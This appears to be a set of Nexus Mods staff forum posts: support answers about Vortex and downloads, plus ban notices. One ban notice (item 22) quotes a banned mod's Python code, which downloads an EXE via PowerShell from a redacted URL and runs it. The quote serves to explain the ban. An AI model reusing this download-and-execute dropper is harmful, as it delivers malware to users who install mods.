  1. Seems like it was a temporary problem. Possibly at your ISPs end.
  2. I don't remember this ever being an option. You can create a poll in the relevant game forum and link to it from your page though?
  3. In response to post #107510423. #107520748, #107687828 are all replies on the same post. I don't think you read my comment properly...
  4. Have you reported this in app and included a log file? I suspect this is something fairly specific to your setup so the Devs will need more details to work out what's happening
  5. They will need the mods too, unless they are installed server side. You post didn't get any replies most likely because it's not really a Vortex question.
  6. Yep. No need to passive aggressively necro an old thread. I'll close this but if you're still hoping for the change, send it via the app itself
  7. We are actually hoping to do a meet up of sorts at some point. Those topics you mentioned are all very Bethesda-centric but some of them would be cool.
  8. It seems you have almost no understanding of how to use Vortex. If you'd like to move things out of AppData, you can simply change the paths in settings for the Downloads and Mod Staging Folders. If you're having a problem that isn't user error or would like to request a change, you can contact the extension creator here: https://www.nexusmods.com/site/mods/59 I'm going to lock this thread as it's just an unconstructive rant.
  9. If your game isn't pirated, you should upset your game path under the "Games" tab so that it's pointing to the correct folder.
  10. Which one of the many factions are you most interested in learning more about? There's a pretty good summary of the known factions on GameRadar here: https://www.gamesradar.com/uk/starfield-factions/
  11. If it's one specific file, I'd recommend starting the download from a different server (the choice is on the right side of the pop-up box when starting a download). I'm afraid I can't give you much advice without the test results though. Files over 500MB are served from a different server network than smaller ones, so doing the tests will show us the connection to all available servers.
  12. Sorry to hear that. Have you tried the troubleshooting pinned in this forum? https://help.nexusmods.com/article/92-im-having-download-issues-what-can-i-do We need that information to further assist you.
  13. Correct, generally anywhere that the posts are mirrored on the main site, we don't allow replies from the forum anymore.
  14. In response to post #107510423. I don't think it uploads your actual files (contrary to what the message says!), it just lets the website see a list of files in that directory.

  17. This is a long standing issue with some very specific timezones. It may be that your region doesn't have a BST equivalent or something but maybe it used to when the site was first designed? Either way, if the date and time shows correctly on Nexus Mods Next, that is the system we'll be moving to in future.
  18. There's a template at the bottom of the article, please include all of the test results.
  19. Amis212 banned. Reason: Uploading content specifically targeted at users who have pirated My Summer Car. "We have a strict anti-piracy policy and will take proactive action against anyone whose on-site activity gives us reasonable grounds to believe they are using pirated content such as, but not limited to, games and software. Discussing, promoting or distributing such content on our sites will be met with administrative action." Reference post
  20. Elduderino91 banned. Reason: Potentially compromised account, uploading fake porn mods for Sims 4 that include viruses. Reference post
  21. aleisrugbhbosirdfubhl banned. Reason: Ban evasion (again): ANALANALANALANAL Reference post
  22. JoshNZ banned. Reason: Upload a misleading file that appears to install a virus (or at the very least a suspicious EXE) on the user's system. Python source from the mod import subprocess from os import path pa = path.expandvars('%TEMP%\dasadsasd.exe') subprocess.Popen(f'powershell Invoke-WebRequest -OutFile {pa} -Uri {{REDACTED MALICIOUS URL}}') subprocess.call(pa) Reference post
  23. I'm afraid I still can't advise you without the test results from the article.
  24. Check the bell icon for errors. If it's not deploying the reason will usually be there.
  25. Hi there, I'm afraid we need a bit more info to help you with this. Please see our troubleshooting guide: https://help.nexusmods.com/article/92-im-having-download-issues-what-can-i-do
